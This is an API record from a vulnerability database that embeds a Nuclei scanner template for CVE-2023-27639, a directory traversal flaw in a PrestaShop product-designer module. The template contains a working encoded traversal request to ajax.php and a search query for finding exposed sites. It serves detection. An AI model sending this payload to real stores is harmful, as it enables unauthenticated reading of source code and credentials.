{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-27639/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-27639/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-27639/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-27639/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-27639/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-27639"},"sightings":{"href":"/api/v1/sightings/cve-2023-27639"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-27639.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2023-27639\n\ninfo:\n  name: PrestaShop TshirteCommerce - Directory Traversal\n  author: MaStErChO\n  severity: high\n  description: |\n    The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.\n  impact: |\n    Unauthenticated attackers can exploit directory traversal in the Custom Product Designer module to read arbitrary files including source code and configuration files, potentially accessing database credentials and sensitive PrestaShop configuration.\n  remediation: |\n    Update the Custom Product Designer (tshirtecommerce) module for PrestaShop to a patched version that validates file paths and prevents directory traversal in ajax.php.\n  reference:\n    - https://www.cvedetails.com/cve/CVE-2023-27639/\n    - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-27639\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-27639\n    cwe-id: CWE-22\n    epss-score: 0.03551\n    epss-percentile: 0.88851\n    cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: tshirtecommerce\n    product: custom_product_designer\n    framework: prestashop\n    google-query: inurl:\"/tshirtecommerce/\"\n  tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/tshirtecommerce/ajax.php?type=svg\"\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n    body: \"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"SqlFormatter Examples\"\n          - \"SqlFormatter\"\n          - \"<?php\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502206e95ca62abd001e962068c7eef759338c8c617b93bfa5b20089affc38fdf6ce6022100b3ab04be37bda83df7a8e1ece06586450df680bff1d810bf007c19a88dd8e9ec:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2023-27639"}